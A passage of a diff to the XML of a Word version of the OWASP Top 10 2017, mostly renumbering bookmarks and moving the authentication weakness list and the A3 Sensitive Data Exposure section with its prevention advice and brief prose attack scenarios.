+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Common authentication vulnerabilities include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>permits credential stuffing, which is where the attacker has a list of valid usernames and passwords</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>permits brute force or other automated attacks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>permits default, weak or well-known passwords, such as "Password1" or "admin/admin"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Missing or ineffective multi-factor authentication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="39" w:name="how-do-i-prevent-1"/>
       <w:bookmarkEnd w:id="39"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Evidence of identity, authentication and session management are critical for separating malicious unauthenticated attackers with users who you might have a legal relationship.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Common authentication vulnerabilities include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>permits credential stuffing, which is where the attacker has a list of valid usernames and passwords</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>permits brute force or other automated attacks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>permits default, weak or well-known passwords, such as "Password1" or "admin/admin"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Missing or ineffective multi-factor authentication</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="how-do-i-prevent-1"/>
-      <w:bookmarkEnd w:id="40"/>
       <w:r>
         <w:rPr/>
         <w:t>How do I prevent</w:t>
@@ -5967,8 +5961,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="example-scenarios-1"/>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkStart w:id="40" w:name="example-scenarios-1"/>
+      <w:bookmarkEnd w:id="40"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -6051,20 +6045,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="references-1"/>
+      <w:bookmarkStart w:id="41" w:name="references-1"/>
+      <w:bookmarkEnd w:id="41"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="42" w:name="owasp-1"/>
       <w:bookmarkEnd w:id="42"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="43" w:name="owasp-1"/>
-      <w:bookmarkEnd w:id="43"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -6267,8 +6261,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="external-1"/>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkStart w:id="43" w:name="external-1"/>
+      <w:bookmarkEnd w:id="43"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -6315,10 +6309,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="45" w:name="__RefHeading___Toc2380_1944273953"/>
-      <w:bookmarkStart w:id="46" w:name="a3-sensitive-data-exposure"/>
+      <w:bookmarkStart w:id="44" w:name="__RefHeading___Toc2369_410054668"/>
+      <w:bookmarkStart w:id="45" w:name="a3-sensitive-data-exposure"/>
+      <w:bookmarkEnd w:id="44"/>
       <w:bookmarkEnd w:id="45"/>
-      <w:bookmarkEnd w:id="46"/>
       <w:r>
         <w:rPr/>
         <w:t>A3 Sensitive Data Exposure</w:t>
@@ -6547,11 +6541,123 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="am-i-vulnerable-to-attack-2"/>
+      <w:bookmarkStart w:id="46" w:name="am-i-vulnerable-to-attack-2"/>
+      <w:bookmarkEnd w:id="46"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS) or the US Gramm-Leach-Bliley Act, or health records laws, such as the US Health Insurance and Portability Act (HIIPA).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>For all such data:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Is any data transmitted in clear text, internally or externally? Internet traffic is especially dangerous, but from load balancers to web servers or from web servers to back end systems can also be problematic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Is sensitive data stored in clear text, including backups of this data?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Are any old or weak cryptographic algorithms used either by default or in older code?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Passive automated findings from tools, such as version disclosure or stack traces are not sensitive and thus not covered by this risk. For a more complete set of problems to avoid and potential solutions, please see the references below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="47" w:name="how-do-i-prevent-2"/>
       <w:bookmarkEnd w:id="47"/>
       <w:r>
         <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
+        <w:t>How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6561,7 +6667,141 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS) or the US Gramm-Leach-Bliley Act, or health records laws, such as the US Health Insurance and Portability Act (HIIPA).</w:t>
+        <w:t>Do the following, at a minimum and consult the references:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Classify data processed, stored or transmitted by a system, for example sensitive personal information, health records, PCI DSS in scope data. Apply controls as per the classification.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Do not collect or store unnecessary sensitive data, or have a data retention plan in place to age out old or unused records. Data you don't retain can't be stolen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Encrypt all sensitive data in rest</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS). This is a requirement that modern browsers will start enforcing by the time the OWASP Top 10 2017 is released. They are currently alerting to unencrypted sites, and most now prevent login form submissions over clear text.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure up-to-date and strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as Argon2i, scrypt, bcrypt and PBKDF2. Also be sure to set the work factor (delay factor) as high as you can tolerate.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Disable browser caching of pages and API responses that contain sensitive data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Verify independently the efficacy of your settings.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="48" w:name="example-scenarios-2"/>
+      <w:bookmarkEnd w:id="48"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Example Scenarios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6571,87 +6811,17 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>For all such data:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Is any data transmitted in clear text, internally or externally? Internet traffic is especially dangerous, but from load balancers to web servers or from web servers to back end systems can also be problematic</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Is sensitive data stored in clear text, including backups of this data?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Are any old or weak cryptographic algorithms used either by default or in older code?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Passive automated findings from tools, such as version disclosure or stack traces are not sensitive and thus not covered by this risk. For a more complete set of problems to avoid and potential solutions, please see the references below.</w:t>
+        <w:t>Scenario #2: A site simply doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could also alter all transported data, e.g. the recipient of a money transfer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #3: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6659,196 +6829,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="48" w:name="how-do-i-prevent-2"/>
-      <w:bookmarkEnd w:id="48"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Do the following, at a minimum and consult the references:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Classify data processed, stored or transmitted by a system, for example sensitive personal information, health records, PCI DSS in scope data. Apply controls as per the classification.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Do not collect or store unnecessary sensitive data, or have a data retention plan in place to age out old or unused records. Data you don't retain can't be stolen.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Encrypt all sensitive data in rest</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS). This is a requirement that modern browsers will start enforcing by the time the OWASP Top 10 2017 is released. They are currently alerting to unencrypted sites, and most now prevent login form submissions over clear text.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure up-to-date and strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as Argon2i, scrypt, bcrypt and PBKDF2. Also be sure to set the work factor (delay factor) as high as you can tolerate.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Disable browser caching of pages and API responses that contain sensitive data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Verify independently the efficacy of your settings.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="49" w:name="example-scenarios-2"/>
+      <w:bookmarkStart w:id="49" w:name="references-2"/>
       <w:bookmarkEnd w:id="49"/>
       <w:r>
         <w:rPr/>
-        <w:t>Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #2: A site simply doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could also alter all transported data, e.g. the recipient of a money transfer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #3: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="50" w:name="references-2"/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="50" w:name="owasp-2"/>
       <w:bookmarkEnd w:id="50"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="owasp-2"/>
-      <w:bookmarkEnd w:id="51"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -6959,8 +6953,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="external-2"/>
-      <w:bookmarkEnd w:id="52"/>
+      <w:bookmarkStart w:id="51" w:name="external-2"/>
+      <w:bookmarkEnd w:id="51"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -7131,10 +7125,10 @@
         </w:numPr>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="53" w:name="__RefHeading___Toc2382_1944273953"/>
-      <w:bookmarkStart w:id="54" w:name="a4-xml-external-entities-xxe"/>
+      <w:bookmarkStart w:id="52" w:name="__RefHeading___Toc2371_410054668"/>
+      <w:bookmarkStart w:id="53" w:name="a4-xml-external-entities-xxe"/>
+      <w:bookmarkEnd w:id="52"/>
       <w:bookmarkEnd w:id="53"/>
-      <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr/>
         <w:t>A4 XML External Entities (XXE)</w:t>
@@ -7363,8 +7357,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="55" w:name="am-i-vulnerable-to-attack-3"/>
-      <w:bookmarkEnd w:id="55"/>
+      <w:bookmarkStart w:id="54" w:name="am-i-vulnerable-to-attack-3"/>
+      <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr/>
         <w:t>Am I vulnerable to attack?</w:t>
@@ -7425,8 +7419,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="56" w:name="how-do-i-prevent-3"/>
-      <w:bookmarkEnd w:id="56"/>
+      <w:bookmarkStart w:id="55" w:name="how-do-i-prevent-3"/>
+      <w:bookmarkEnd w:id="55"/>
       <w:r>
         <w:rPr/>
         <w:t>How do I prevent</w:t>
@@ -7529,8 +7523,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="example-scenarios-3"/>
-      <w:bookmarkEnd w:id="57"/>
+      <w:bookmarkStart w:id="56" w:name="example-scenarios-3"/>
+      <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -7669,20 +7663,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="58" w:name="references-3"/>
+      <w:bookmarkStart w:id="57" w:name="references-3"/>
+      <w:bookmarkEnd w:id="57"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="58" w:name="owasp-3"/>
       <w:bookmarkEnd w:id="58"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
